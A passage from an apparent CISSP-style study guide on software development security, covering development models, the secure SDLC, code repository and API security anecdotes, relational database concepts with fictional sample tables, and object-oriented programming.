• Forty-hour workweek: the forecasted iterations should be accurate enough 
to forecast how many hours will be required to complete the project. If 
programmers must put in additional overtime, the iteration must be flawed. 

• Total customer involvement: the customer is always available, and carefully 
monitors the project. 

• Detailed test procedures: they are called Unit Tests. [16] 


NOTE 

The XP development model is not to be confused with Microsoft Windows XP: Extreme 
Programming’s use of the acronym “XP” predates Microsoft’s use. 


SPIRAL 

The Spiral Model is a software development model designed to control risk. Barry W. 
Boehm created the model, described in his 1986 paper “A Spiral Model of Software 
Development and Enhancement” (see: http://portal. acm.org/citation. cfm?id= 12948). 
Boehm states, “The major distinguishing feature of the spiral model is that it creates 
a risk-driven approach to the software process rather than a primarily document- 
driven or code-driven process. It incorporates many of the strengths of other models 
and resolves many of their difficulties.” [17] 

The spiral model repeats steps of a project, starting with modest goals, and 
expanding outwards in ever-wider spirals (called rounds). Each round of the spiral 
constitutes a project, and each round may follow traditional software development 
methodology such as Modified Waterfall. A risk analysis is performed each round. 
Fundamental flaws in the project or process are more likely to be discovered in the 
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earlier phases, resulting in simpler fixes. This lowers the overall risk of the project: 
large risks should be identified and mitigated. 

Boehm used the Spiral Model to develop the TRW Software Productivity System 
(TRW-SPS), a complex software project that resulted in 1,300,000 computer instruc- 
tions. “Round zero” was a feasibility study, a small project designed to determine if 
the TRW-SPS project represented significant value to the organization, and was thus 
worth the risk of undertaking. The feasibility study indicated that the project was 
worthwhile (low risk), and the project spiraled outward. The deliverables of further 
rounds included: 

1 . Concept of Operations (COOP) 

2. Software Requirements 

3. Software Product Design 

4. Detailed Design [18] 

Each round included multiple repeated steps, including prototype development 
and, most importantly, a risk analysis. Boehm’s spiral is shown in Figure 9.4. 

The spiral ended with successful implementation of the project. Any poten- 
tial high risk, such as lack of value to the organization or implementation failure, 
was identified and mitigated earlier in the spiral, when it was cheaper and easier to 
mitigate. 


RAPID APPLICATION DEVELOPMENT (RAD) 

Rapid Application Developmen t (RAD) rapidly develops software via the use of pro- 
totypes, “dummy” GUIs, back-end databases, and more. The goal of RAD is quickly 
meeting the business need of the system; technical concerns are secondary. The cus- 
tomer is heavily involved in the process. 

According to the Centers for Medicare & Medicaid Services (see: http://www. 
cms.gov/Research-Statistics-Data-and-Systems/CMS-Information-Technology/XLC/ 
Downloads/SelectingDevelopmentApproach.pdf), RAD “Aims to produce high quality 
systems quickly, primarily through the use of iterative prototyping (at any stage of de- 
velopment), active user involvement, and computerized development tools. These tools 
may include Graphical User Interface (GUI) builders, Computer Aided-Software En- 
gineering (CASE) tools, Database Management Systems (DBMS), fourth-generation 
programming languages, code generators, and object-oriented techniques.” [20] 


PROTOTYPING 

Prototyping is an iterative approach that breaks projects into smaller tasks, creat- 
ing multiple mockups (prototypes) of system design features. This lowers risk by 
allowing the customer to see realistic-looking results long before the final product 
is completed. As with other modern development methods, there is a high level of 
customer involvement: the customer inspects the prototypes to ensure that the project 
is on track and meeting its objective. 
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FIGURE 9.4 The Spiral Model [19] 


The term “prototype” may be a bit misleading: later stage prototypes may be used 
as the actual final product. Prototypes can be thought of as “working model.” Proto- 
typing is not a full-fledged software development methodology: it is used by other 
iterative methods such as Spiral or RAD. 

SDLC 

The Systems Development Life Cycle {SDLC, also called the Software Development 
Life Cycle or simply the System Life Cycle) is a system development model. SDLC 
is used across the IT industry, but SDLC focuses on security when used in context of 
the exam. Think of “our” SDLC: as the “Secure Systems Development Life Cycle”: 
the security is implied. 

On the exam, SDLC focuses on security in every phase. This model is broader 
than many application development models, focusing on the entire system, from 
selection/development, through operational requirements, to secure disposal. There 
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are many variants of the SDLC, but most follow (or are based on) the National Insti- 
tute of Standards and Technology (NIST) SDLC process. 

NIST Special Publication 800-14 states: “Security, like other aspects of an IT 
system, is best managed if planned for throughout the IT system life cycle. There 
are many models for the IT system life cycle but most contain five basic phases: 
initiation, development/acquisition, implementation, operation, and disposal.” [21] 
Additional steps are often added, most critically the security plan, which is the first 
step of any SDLC. The following overview is summarized from NIST SP 800-14: 

• Prepare a Security Plan: Ensure that security is considered during all phases of 
the IT system life cycle, and that security activities are accomplished during 
each of the phases. 

• Initiation: The need for a system is expressed and the purpose of the system is 
documented 

• Conduct a Sensitivity Assessment: Look at the security sensitivity of the 
system and the information to be processed. 

• Development/acquisition: The system is designed, purchased, programmed or 
developed. 

• Determine Security Requirements: Determine technical features (like access 
controls), assurances (like background checks for system developers), or 
operational practices (like awareness and training). 

• Incorporate Security Requirements Into Specifications: Ensure that the 
previously gathered information is incorporated in the project plan. 

• Obtain the System and Related Security Activities: May include developing 
the system’s security features, monitoring the development process itself for 
security problems, responding to changes, and monitoring threats. 

• Implementation: The system is tested and installed. 

• Install/Turn-On Controls: A system often comes with security features 
disabled. These need to be enabled and configured. 

• Security Testing: Used to certify a system; may include testing security 
management, physical facilities, personnel, procedures, the use of commercial 
or in-house services (such as networking services), and contingency planning. 

• Accreditation: The formal authorization by the accrediting (management) 
official for system operation and an explicit acceptance of risk. 

• Operation/Maintenance: The system is modified by the addition of hardware 
and software and by other events. 

• Security Operations and Administration: Examples include backups, 
training, managing cryptographic keys, user administration, and patching. 

• Operational Assurance: Examines whether a system is operated according to 
its current security requirements. 

• Audits and Monitoring: A system audit is a one-time or periodic event to 
evaluate security. Monitoring refers to an ongoing activity that examines 
either the system or the users. 
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• Disposal: The secure decommission of a system. 

• Information: Information may be moved to another system, archived, 
discarded, or destroyed. 

• Media Sanitization: There are three general methods of purging media: 
overwriting, degaussing (for magnetic media only), and destruction. [22] 

Notice that the word “secure” or “security” appears somewhere in every step of 
NIST’s SDLC, from project initiation to disposal: this is the crux of the SDLC. 


NOTE 

Security is part of every step of “secure” SDLC on the exam. Any step that omits security is the 
“wrong answer.” Also, any SDLC plan that omits secure disposal as the final lifecycle step is also 
the “wrong answer.” 


Many organizations have broadened the SDLC process, beginning with the 
framework described in NIST SP 800-14, and adding more steps. The United States 
Department of Justice (DOJ) describes a 10-step SDLC (see: http://www.justice.gov/ 
archive/jmd/irm/lifecycle/chl.htm). The text from the DOJ SDLC graphic, shown in 
Figure 9.5, is summarized here: 


EXAM WARNING 


Memorizing the specific steps of each SDLC is not required, but be sure to understand the logical 
(secure) flow of the SDLC process. 


• “Initiation: Begins when a sponsor identifies a need or an opportunity. Concept 
Proposal is created 

• System Concept Development: Defines the scope or boundary of the 
concept. Includes Systems Boundary Document, Cost Benefit Analysis, Risk 
Management Plan and Feasibility Study 

• Planning: Develops a Project Management Plan and other planning documents. 
Provides the basis for acquiring the resources needed to achieve a solution 

• Requirements Analysis: Analyzes user needs and develops user requirements. 
Creates a detailed Functional Requirements Document 

• Design: Transforms detailed requirements into complete, detailed System 
Design Document. Focuses on how to deliver the required functionality 

• Development: Converts a design into a complete information system. Includes 
acquiring and installing systems environment; creating and testing databases/ 
preparing test case procedures; preparing test files; coding, compiling, refining 
programs; performing test readiness review and procurement activities 
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• Integration and Test: Demonstrates that the developed system conforms to 
requirements as specified in the Functional Requirements Document. Conducted 
by the Quality Assurance staff and users. Produces Test Analysis Reports 

• Implementation: Includes implementation preparation, implementation of the 
system into a production environment, and resolution of problems identified in 
the Integration and Test Phase 

• Operations and Maintenance: Describes tasks to operate and maintain 
information systems in a production environment. Includes Post-Implementation 
and In-Process Reviews 

• Disposition: Describes end-of-system activities. Emphasis is given to proper 
preservation of data” [231 


INTEGRATED PRODUCT TEAMS 

An Integrated Product Team (IPT) is a customer-focused group that focuses on the 
entire lifecycle of a project: 

An Integrated Product Team (IPT) is a multidisciplinary group of people who 
are collectively responsible for delivering a defined product or process. The IPT 
is composed of people who plan, execute, and implement life-cycle decisions for 
the system being acquired. It includes empowered representatives (stakeholders) 
from all of the functional areas involved with the product — all who have a stake 
in the success of the program, such as design, manufacturing, test and evaluation 
(T&E), and logistics personnel, and, especially, the customer. [25] 

Integrated Product Teams are a more agile method that traditional hierarchi- 
cal teams: they “...move away from a pattern of hierarchical decision-making to 
a process where decisions are made across organizational structures by integrated 
product teams. It means we are breaking down institutional barriers. It also means 
that our senior acquisition staffs are in a receive mode not just a transmit mode. 
The objective is to be receptive to ideas from the field to obtain buy-in and lasting 
change.” [26] 


SOFTWARE ESCROW 

Software escrow describes the process of having a third party store an archive of 
computer software. This is often negotiated as part of a contract with a proprietary 
software vendor. The vendor may wish to keep the software source code secret, but 
the customer may be concerned that the vendor could go out of business (potentially 
orphaning the software). Orphaned software with no available source code will not 
receive future improvements or patches. 

Software escrow places the source code in escrow, under the control of a neutral 
third party. A contract strictly specifies the conditions for potential release of the 
source code to the customer, typically due to the business failure of the software 
vendor. 
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CODE REPOSITORY SECURITY 

The security of private/internal code repositories largely falls under other corporate 
security controls discussed previously: defense in depth, secure authentication, fire- 
walls, version control, etc. 

Public third party code repositories such as GitHub (http://www.github.com) raise 
additional security concerns. They provide the following list of security controls: 

• System Security 

• Operational Security 

• Software Security 

• Secure Communications 

• File system and backups 

• Employee access 

• Maintaining security 

• Credit card safety [27] 

Beyond the security of the code hosting provider itself, one of the most important 
controls is secure authentication leveraging dual factor authentication. Accidentally 
publishing private code as public is a common mistake made by developers. This 
includes accidentally publishing code that includes passwords or private keys. Many 
criminals have automated searches for this type of content. 


LEARN BY EXAMPLE 

A compromised key leads to a $6500 Amazon bill 

In 2015 Carlo van Wyk published code to his private GitHub account via Microsoft Visual Studio 
2015, and ‘a simple bug in Visual Studio meant that source code that was destined for a secure and 
private source code repository was instead published to a public repository. What followed was a 
sequence of events which left me with a $6,500 bill.’ [28] 

The bug was in the GitHub extension included in Visual Studio 2015, and code marked 
private was marked public. The code included a private Amazon access key: “To my dismay, I 
discovered that the repository was created as a public repository. Not only has my source code been 
compromised, but an Amazon access key for the Alexa web information service, contained in a 
configuration file, has been exposed in the wild.” [29] 

The bots soon swarmed in: “As soon as it was out in the wild, it was too late. Bots scan GitHub 
repositories and it only takes 2 or 3 minutes for some of them to pick this up.” Criminals then spawned 
many Amazon cloud instances using Carlo’s account, and used them to mine the cryptocurrency Bitcoin. 
Carlo includes a great summary of issues: 

“How is it possible that my data was breached so quickly? 

• Bitcoin miners continuously scan GitHub source code for amazon access keys. 

• They then use these keys to spawn large numbers of (Amazon cloud) EC2 instances to mine for 
bitcoins. 

• They make big coin while those who were exploited are left with huge bills 
What could be done to prevent and mitigate this? 

• Always test new version control GUIs before using them in the wild. There could be a bug that 
could expose your data. 

• Encrypt sensitive information in config files 

• Move access keys to a separate config file, and exclude this from Git deploys. 

• Amazon could implement daily max budgets by default 

• Ideally, Amazon shouldn’t allow infinite expenditure” [30] 
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SECURITY OF APPLICATION PROGRAMMING INTERFACES (APIs) 

An Application Programming Interface (API) allows an application to communi- 
cate with another application, or an operating system, database, network, etc. For 
example, the Google Maps API allows an application to integrate 3 rd -party content, 
such as restaurants overlaid on a Google Map. 

A real-world example of API exploitation includes a hack of the Facebook API, 
exploited by security researcher Reza Moaiandin to harvest thousands of Facebook 
profiles in 2015: 

“Reza Moaiandin, the software engineer who discovered the flaw, exploited a 
little-known privacy setting allowing anyone to find a Facebook user by typing their 
phone number into the social network. 

By default, this Who can find me? setting is set to Everyone/public - meaning 
anyone can find another user by their mobile number. This is the default setting even 
if that user had chosen to withhold their mobile number from their public profile. 

Using a simple algorithm, Moaiandin generated tens of thousands of mobile 
numbers a second and then sent these numbers to Facebook’ s application program- 
ming interface (API), a tool that allows developers to build apps linked to the social 
network. Within minutes, Facebook sent him scores of users’ profiles. 

All the information Moaiandin received was publicly available, but the ability to 
link the profiles to mobile numbers on such a large scale leaves the system open to 
abuse.” [31] 

The OWASP Enterprise Security API Toolkits project includes these critical API 
controls: 

• Authentication 

• Access control 

• Input validation 

• Output encoding/escaping 

• Cryptography 

• Error handling and logging 

• Communication security 

• HTTP security 

• Security configuration [32] 

SOFTWARE CHANGE AND CONFIGURATION MANAGEMENT 

Software Change and Configuration Management provides a framework for manag- 
ing changes to software as it is developed, maintained, and eventually retired. Some 
organizations treat this as one discipline; the exam treats configuration management 
and change management as separate (but related) disciplines. 

In regards to the Software Development Security domain, configuration manage- 
ment tracks changes to a specific piece of software. For example: tracking changes 
to a Content Management System (CMS), including specific settings within the soft- 
ware. Change management is broader, tracking changes across an entire software 
development program. In both cases, both configuration and change management are 
designed to ensure that changes occur in an orderly fashion, and do not harm (and 
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ideally improve) information security. We discussed change management in Chap- 
ter 8, Domain 7 : Security Operations. 

NIST Special Publication 80-128: Guide for Security-Focused Configuration 
Management of Information Systems (available at: http://csrc.nist.gov/publications/ 
nistpubs/800-128/sp800-128.pdf) describes the following configuration manage- 
ment terms: 

“A Configuration Management Plan (CM Plan) is a comprehensive description 
of the roles, responsibilities, policies, and procedures that apply when managing the 
configuration of products and systems. The basic parts of a CM Plan include: 

• Configuration Control Board (CCB) - Establishment of and charter for a 
group of qualified people with responsibility for the process of controlling and 
approving changes throughout the development and operational lifecycle of 
products and systems; may also be referred to as a change control board; 

• Configuration Item Identification - methodology for selecting and naming 
configuration items that need to be placed under CM; 

• Configuration Change Control - process for managing updates to the baseline 
configurations for the configuration items; and 

• Configuration Monitoring - process for assessing or testing the level of 
compliance with the established baseline configuration and mechanisms for 
reporting on the configuration status of items placed under CM” [33] 


DevOps 

Traditional software development was performed with strict separation of duties 
between the developers, quality assurance teams, and production teams. Developers 
had hardware that mirrored production models, and test data. They would hand code 
off the quality assurance teams, who also had hardware that mirrored production 
models, as well as test data. The quality assurance teams would then hand tested code 
over to production, who had production hardware and real data. 

In the old (less agile) model: developers had no direct contact with production, 
and in fact were strictly walled off from production via separation of duties. 

DevOps is a more agile development and support model, echoing the agile 
programming methods we learned about previously in this chapter, including 
Sashimi and Scrum. DevOps is, “the practice of operations and development 
engineers participating together in the entire service lifecycle, from design through 
the development process to production support.” [34] 


DATABASES 

A database is a structured collection of related data. Databases allow queries 
(searches), insertions (updates), deletions, and many other functions. The database 
is managed by the Database Management System (DBMS), which controls all 
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access to the database and enforces the database security. Databases are managed by 
Database Administrators (DBAs). Databases may be searched with a database query 
language, such as the Structured Query Language (SQL). Typical database security 
issues include the conbdentiality and integrity of the stored data. Integrity is a primary 
concern when replicated databases are updated. 

Additional database confidentiality issues include inference and aggregation 
attacks, discussed in detail in Chapter 4, Domain 3: Security Engineering. 
Aggregation is a mathematical attack where an attacker aggregates details at a lower 
classification to determine information at a higher classification. Inference is a 
similar attack, but the attacker must logically deduce missing details: unlike 
aggregation, a mystery must be solved. 

TYPES OF DATABASES 

Formal database types include relational (two dimensional), hierarchical, and object- 
oriented. The simplest form of database is aflat file: a text file that contains multiple 
lines of data, each in a standard format. A host file (located at/etc/hosts on UNIX 
systems, and c:\windows\system32\drivers\etc\hosts on many versions of Microsoft 
Windows) is an example of a flat file: each entry (line) contains at least an IP address 
and a host name. 

Relational Databases 

The most common modern database is the relational database, which contain two- 
dimensional tables of related (hence the term “relational”) data. A table is also 
called a relation. Tables have rows and columns: a row is a database record, called a 
tuple: a column is called an attribute. A single cell (intersection of a row and column) 
in a database is called a value. Relational databases require a unique value called the 
primary key in each tuple in a table. Table 9. 1 shows a relational database employee 
table, sorted by the primary key (SSN, or Social Security Number). 

Table 9.1 attributes are SSN, Name, and Title. Tuples include each row: 
133-73-1337, 343-53-4334, etc. “Gaff’ is an example of a value (cell). Candidate 
keys are any attribute (column) in the table with unique values: candidate keys in 
the previous table include SSN and Name; SSN was selected as the primary key 
because it is truly unique (two employees could have the same name, but not the 
same SSN). The primary key may join two tables in a relational database. 


Table 9.1 Relational Database Employee Table 


SSN 

Name 

Title 

133-73-1337 

J.F. Sebastian 

Designer 

343-53-4334 

Eldon Tyrell 

Doctor 

425-22-8422 

Gaff 

Detective 

737-54-2268 

Rick Deckard 

Detective 

990-69-4771 

Hannibal Chew 

Engineer 
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Table 9.2 HR Database Table 


SSN 

Vacation Time 

Sick Time 

133-73-1337 

15 days 

20 days 

343-53-4334 

60 days 

90 days 

425-22-8422 

10 days 

15 days 

737-54-2268 

3 days 

1 day 

990-69-4771 

15 days 

5 days 


Foreign Keys 

A foreign key is a key in a related database table that matches a primary key in a 
parent database table. Note that the foreign key is the local table’s primary key: it is 
called the foreign key when referring to a parent table. Table 9.2 is the HR database 
table that lists employee’s vacation time (in days) and sick time (also in days); it has 
a foreign key of SSN. The HR database table may be joined to the parent (employee) 
database table by connecting the foreign key of the HR table to the primary key of 
the employee table. 

Referential, Semantic and Entity Integrity 

Databases must ensure the integrity of the data in the tables: this is called data integ- 
rity, discussed in the “Database Integrity” section below. There are three additional 
specific integrity issues that must be addressed beyond the correctness of the data 
itself: Referential, Semantic, and Entity Integrity. These are tied closely to the logical 
operations of the DBMS. 

Referential integrity means that every foreign key in a secondary table matches 
a primary key in the parent table: if this is not true, referential integrity has been 
broken. Semantic integrity means that each attribute (column) value is consistent 
with the attribute data type. Entity integrity means each tuple has a unique primary 
key that is not null. The HR database table shown in Table 9.2, seen previously, has 
referential, semantic, and entity integrity. Table 9.3, on the other hand, has multiple 
problems: one tuple violates referential integrity, one tuple violates semantic integ- 
rity, and the last two tuples violate entity integrity. 

The tuple with the foreign key 467-51-9732 has no matching entry in the 
employee database table. This breaks referential integrity: there is no way to link 
this entry to a name or title. Cell “Nexus 6” violates semantic integrity: the sick time 


Table 9.3 Database Table Lacking Integrity 


SSN 

Vacation Time 

Sick Time 

467-51-9732 

7 days 

14 days 

737-54-2268 

3 days 

Nexus 6 

133-73-1337 

1 6 days 

22 days 

133-73-1337 

15 days 

20 days 
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attribute requires values of days, and “Nexus 6” is not a valid amount of sick days. 
Finally, the last two tuples both have the same primary key (primary to this table; 
foreign key to the parent employees table); this breaks entity integrity. 

Database Normalization 

Database normalization seeks to make the data in a database table logically concise, 
organized, and consistent. Normalization removes redundant data, and improves the 
integrity and availability of the database. Normalization has three rules, called forms 
(see: http://www.informit. com/articles/article. aspx?p=30646 for more information): 

• First Normal Form (INF): Divide data into tables. 

• Second Normal Form (2NF): Move data that is partially dependent on the 
primary key to another table. The HR Database (Table 9.2) is an example of 
2NF. 

• Third normal Form (3NF): Remove data that is not dependent on the primary 
key. [35] 

Database Views 

Database tables may be queried; the results of a query are called a database view. 
Views may be used to provide a constrained user interface : for example, non- 
management employees can be shown their individual records only via database 
views. Table 9.4 shows the database view resulting from querying the employee table 
“Title” attribute with a string of “Detective.” While employees of the HR department 
may be able to view the entire employee table, this view may be authorized for the 
captain of the detectives, for example. 

The Data Dictionary 

The data dictionary contains a description of the database tables. This is called 
metadata: data about data. The data dictionary contains database view information, 
information about authorized database administrators, user accounts including 
their names and privileges, and auditing information, among others. A critical data 
dictionary component is the database schema: it describes the attributes and values 
of the database tables. Table 9.5 shows a very simple data dictionary that describes 
the two tables we have seen previously this chapter: employees and HR. 

Database Query Languages 

Database query languages allow the creation of database tables, read/write access 
to those tables, and many other functions. Database query languages have at least 
two subsets of commands: Data Definition Language (DDL) and Data Manipulation 

Table 9.4 Employee Table Database view “Detective” 


SSN 

Name 

Title 

425-22-8422 

Gaff 

Detective 

737-54-2268 

Rick Deckard 

Detective 
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Table 9.5 Simple Database Schema 


Table 

Attribute 

Type 

Format 

Employee 

SSN 

Digits 

###-##-#### 

Employee 

Name 

String 

<30 characters> 

Employee 

Title 

String 

<30 characters> 

HR 

SSN 

Digits 

###-##-#### 

HR 

Sick Time 

Digits 

### days 

HR 

Vacation Time 

Digits 

### days 


Language (DML). DDL is used to create, modify, and delete tables. DML is use to 
query and update data stored in the tables. 

The most popular relational database query language is SQL (Structured Query 
Language), created by IBM in 1974. Many types of SQL exist, including MySQL, 
PostgreSQL, PL/SQL (Procedural Language/SQL, used by Oracle), T-SQL and 
ANSI SQL (used by Microsoft SQL), and many others. 

Common SQL commands include: 

• CREATE: create a table 

• SELECT : select a record 

• DELETE: delete a record (or a whole table) 

• INSERT: insert a record 

• UPDATE: change a record 

Tables are created with the CREATE command, which uses Data Definition Lan- 
guage to describe the format of the table that is being created. An example of a Data 
Manipulation Language command is SELECT, which is used to search and choose 
data from a table. The following SELECT command could be used to create the 
database view shown in Table 9.4: 

SELECT * FROM Employees WHERE Title = "Detective" 


This means: show any (“*”) records where the Title is “Detective.” 

Hierarchical Databases 

Hierarchical databases form a tree: the global Domain Name Service (DNS) servers 
form a global tree. The root name servers are at the “root zone” at the base of the tree; 
individual DNS entries form the leaves, www.syngress.com points to the syngress. 
com DNS database, which is part of the dot com (.com) top level domain (TLD), 
which is part of the global DNS (root zone). From the root, you may go back down 
another branch, down to the dot gov (.gov) TLD, to the nist.gov (National Institute of 
Standards and Technologies) domain, to www.nist.gov. 

A special form of hierarchical database is the network model (referring to net- 
works of people, not data networks): this allows branches of a hierarchical database 
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to have two parents (two connections back to the root). Imagine an organization’s org 
chart is stored in a database that forms a tree, with the CEO as the root of the hierar- 
chy. In this company, the physical security staff reports to both facilities (for facility 
issues) and to IT (for data center physical security). The network model allows the 
physical security staff to have “two bosses” in the hierarchical database: reporting 
through an IT manager and a facilities manager. 

Object-Oriented Databases 

While databases traditionally contain just (passive) data, object-oriented databases 
combine data with functions (code) in an object-oriented framework. Object-Oriented 
Programming (OOP) is used to manipulate the objects (and their data), managed by 
an Object Database Management System (ODBMS). 


DATABASE INTEGRITY 

In addition to the previously discussed relational database integrity issues of seman- 
tic, referential, and entity integrity, databases must also ensure data integrity: the 
integrity of the entries in the database tables. This treats integrity as a more general 
issue: mitigating unauthorized modifications of data. The primary challenge associ- 
ated with data integrity within a database is simultaneous attempted modifications 
of data. A database server typically runs multiple threads (lightweight processes), 
each capable of altering data. What happens if two threads attempt to alter the same 
record? 

DBMSs may attempt to commit updates: make the pending changes permanent. If 
the commit is unsuccessful, the DBMSs can rollback (also called abort) and restore 
from a savepoint (clean snapshot of the database tables). 

A database journal is a log of all database transactions. Should a database become 
corrupted, the database can be reverted to a back-up copy, and then subsequent 
transactions can be “replayed” from the journal, restoring database integrity. 


DATABASE REPLICATION AND SHADOWING 

Databases may be highly available (HA), replicated with multiple servers containing 
multiple copies of tables. Integrity is the primary concern with replicated databases: 
if a record is updated in one table, it must be simultaneously updated in all tables. 
Also, what happens if two processes attempt to update the same tuple simultaneously 
on two different servers? They both cannot be successful; this would violate the 
integrity of the tuple. 

Database replication mirrors a live database, allowing simultaneous reads 
and writes to multiple replicated databases by clients. Replicated databases pose 
additional integrity challenges. A two-phase (or multiphase) commit can be used 
to assure integrity: before committing, the DBMS requests a vote. If the DBMSs 
on each server agree to commit, the changes are made permanent. If any DBMSs 
disagree, the vote fails, and the changes are not committed (not made permanent). 
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A shadow database is similar to a replicated database, with one key difference: 
a shadow database mirrors all changes made to a primary database, but clients do 
not access the shadow. Unlike replicated databases, the shadow database is one- 
way (data flows from primary to shadow): it serves as a live data backup of the 
primary. 

DATA WAREHOUSING AND DATA MINING 

As the name implies, a data warehouse is a large collection of data. Modern data 
warehouses may store many terabytes (1,000 gigabytes) or even petabytes (1,000 
terabytes) of data. This requires large scalable storage solutions. The storage must be 
high performance, and allow analysis and searches of the data. 

Once data is collected in a warehouse, data mining is used to search for patterns. 
Commonly sought patterns include signs of fraud. Credit card companies manage 
some of the world’s largest data warehouses, tracking billions of transactions per year. 
Fraudulent transactions are a primary concern of credit card companies that lead to 
millions of dollars in lost revenue. No human could possibly monitor all of those 
transactions, so the credit card companies use data mining to separate the signal from 
noise. A common data mining fraud rule monitors multiple purchases on one card in 
different states or countries in a short period of time. A violation record can be pro- 
duced when this occurs, leading to suspension of the card or a phone call to the card 
owner’s home. 


OBJECT-ORIENTED DESIGN AND PROGRAMMING 

Object oriented design and programming uses an object metaphor to design and write 
computer programs. Our bodies are comprised of objects that operate independently 
and communicate with each other. Our eyes are independent organs (objects) that 
receive input of light, and send an output of nerve impulse to our brains. Our hearts 
receive deoxygenated blood from our veins and oxygen from our lungs, and send 
oxygenated blood to our arteries. Many organs can be replaced: a diseased liver can 
be replaced with a healthy liver. Object-Oriented Programming (OOP) replicates the 
use of objects in computer programs. Object-Oriented Design (OOD) treats objects 
as a higher-level design concept, like a flow chart. 

OBJECT-ORIENTED PROGRAMMING (OOP) 

Object-Oriented Programming (OOP) changes the older structured programming 
methodology, and treats a program as a series of connected objects that communi- 
cate via messages. Object-Oriented Programming attempts to model the real world. 
Examples of OOP languages include Java, C++, Smalltalk, and Ruby. 

An object is a “black box” that is able to perform functions, and sends and 
receives messages. Objects contain data and methods (the functions they perform). 
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The object provides encapsulation (also called data hiding ): we do not know, from 
the outside, how the object performs its function. This provides security benefits: 
users should not be exposed to unnecessary details. Think of your sink as an object 
whose function is washing hands. The input message is clean water; the output 
message is dirty water. You do not know or care about where the water is coming 
from, or where it is going. If you are thinking about those issues, the sink is prob- 
ably broken. 

Cornerstone Object-Oriented Programming Concepts 

Cornerstone object-oriented programming concepts include objects, methods, 
messages, inheritance, delegation, polymorphism, and poly instantiation. We will 
use an example object called “Addy” to illustrate the cornerstone concepts. Addy 
is an object that adds two integers; it is an extremely simple object, but has enough 
complexity to explain core OOP concepts. Addy inherits an understanding of 
numbers and math from his parent class (the class is called mathematical operators). 
A specific object is called an instance. Note that objects may inherit from other 
objects, in addition to classes. 

In our case, the programmer simply needs to program Addy to support the method 
of addition (inheritance takes care of everything else Addy must know). Figure 9.6 
shows Addy adding two numbers. 

“1 + 2” is the input message; “3” is the output message. Addy also supports del- 
egation: if he does not know how to perform a requested function, he can delegate 
that request to another object (called “Subby” in Figure 9.7). 

Addy also supports polymorphism (based on the Greek roots “poly” and “morph,” 
meaning many and forms, respectively): he has the ability to overload his plus (“ + ”) 
operator, performing different methods depending on the context of the input mes- 
sage. For example: Addy adds when the input message contains “number + number”; 
polymorphism allows Addy to concatenate two strings when the input message con- 
tains “string + string,” as shown in Figure 9.8. 

Finally, polyinstantiation means “many instances,” two instances (specific 
objects) with the same names that contain different data. This may be used in 
multilevel secure environments to keep top secret and secret data separate, for 
example. See Domain 3: Security Engineering for more information about poly- 
instantiation. Figure 9.9 shows polyinstantiated Addy objects: two objects with 
the same name but different data. Note that these are two separate objects. Also, 
to a secret-cleared subject, the Addy object with secret data is the only known 
Addy object. 




FIGURE 9.6 The “Addy” Object 
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FIGURE 9.9 Polyinstantiation 


Here is a summary of Object-Oriented Programming concepts illustrated by 
Addy: 

• Object: Addy 

• Class: Mathematical operators 

• Method: Addition 

• Inheritance: Addy inherits an understanding of numbers and math from his 
parent class mathematical operators. The programmer simply needs to program 
Addy to support the method of addition 

• Example input message: 1+2 

• Example output Message: 3 

• Polymorphism: Addy can change behavior based on the context of the input, 
overloading the “ + ” to perform addition, or concatenation, depending on the 
context 

• Polyinstantiation: Two Addy objects (secret and top secret), with different data 

Coupling and Cohesion 

Coupling and cohesion are two concepts used to describe objects. A highly coupled 
object (such as Addy) requires lots of other objects to perform basic jobs, like math. 
An object with high cohesion is far more independent: it can perform most functions 
independently. Objects with high coupling have low cohesion, and the reverse is also 
true: objects with low coupling have high cohesion. 
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Addy is highly coupled and has low cohesion: he must delegate any message 
that does not contain a “ + Imagine another object called “Calculator,” which can 
add, subtract, multiply, divide, perform square roots, exponentiation, etc. Calculator 
would have high cohesion and low coupling. 


LEARN BY EXAMPLE 

Managing Risk Though Objects 

Objects are designed to be reused: this lowers development costs. Objects can also lower risk. Much 
like strong encryption such as AES, the longer an object remains in secure use, the more assurance 
we have that the object is truly secure. Like encryption algorithms, as time passes, and countless 
attacks prove unsuccessful, the object demonstrates its real-world strength. 

Let us assume your company has been selling information security books online for the past 
5 years. Your website allows users to choose a book, such as TCP/IP Illustrated by W. Richard 
Stevens, and enter their name, address, and credit card billing information. Credit card transactions 
are risky: risks include disclosure of customer’s PII, as well as risk of credit card fraud: stolen cards 
used to fraudulently purchase books. 

The website is programmed in an object-oriented language. It includes a credit card processing 
object called CCValidate, first written 5 years ago. The input message is the credit card number 
and expiration date entered by the customer. The output message is binary: “approved” or 
“denied.” 

The CCValidate object hides the complexity of what is happening in the background after the 
input message of credit card number and expiration date are entered. It performs the following 
methods: 

1 . The object has variable buffers for the credit card number that perform bounds checking. 

2. The object ensures that the input message is the proper length and contains the proper types of 
characters in each field. 

a. In the case of a MasterCard®, 16 numbers (the credit card number), followed by the date 
(two-digit month followed by a four-digit year). 

b. Any input message that does not meet these criteria is immediately rejected. 

3. The object ensures the expiration date is in the future. 

a. Any input message that does not meet this criterion is immediately rejected. 

4. The object then evaluates the format and self-checking digits within the entered credit card 
number. 

a. Valid MasterCard® numbers start with 51-55, and have 16 digits. 

b. They must also contain proper self-checking digits. 

- See: http://web.eecs.umich.edu/~bartlett/credit_card_number.html for more information 

c. Any input message that does not meet these criteria is immediately rejected. 

5. The object then sends a message to the proper credit card company server, checking to see if the 
card is valid and contains enough balance to make a purchase. 

a. The credit card company sends a return message of “accept” or “denied,” which the credit 
card object sends to the web server as a message. 

As CCValidate is used, bugs may be discovered and fixed. Improvements may be identified 
and coded. Over time, the object matures and simply does its job. It is attacked on the Internet; 
attackers launch buffer overflow attacks and insert garbage numbers, and the object performs 
admirably. 

If a new site comes online, the programmers should not create a new credit card validating 
object by scratch: reinventing the wheel is too risky. They should manage their risk by locating and 
using a mature object that has stood the test of time: CCValidate. 
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OBJECT REQUEST BROKERS 

As we have seen previously, mature objects are designed to be reused: they lower 
risk and development costs. Object Request Brokers (ORBs) can be used to locate 
objects: they act as object search engines. ORBs are middleware', they connect 
programs to programs. Common object brokers included COM, DCOM, and 
CORBA. 

COM and DCOM 

Two object broker technologies by Microsoft are COM ( Component Object Model) 
and DCOM ( Distributed Component Object Model). COM locates objects on a local 
system; DCOM can also locate objects over a network. 

COM allows objects written with different OOP languages to communicate, 
where objects written in C++ send messages to objects written in Java, for example. 
It is designed to hide the details of any individual object, and focuses on the object’s 
capabilities. According to Microsoft® (see: http://www.microsoft.com/com/default. 
mspx), COM “is used by developers to create reusable software components, link 
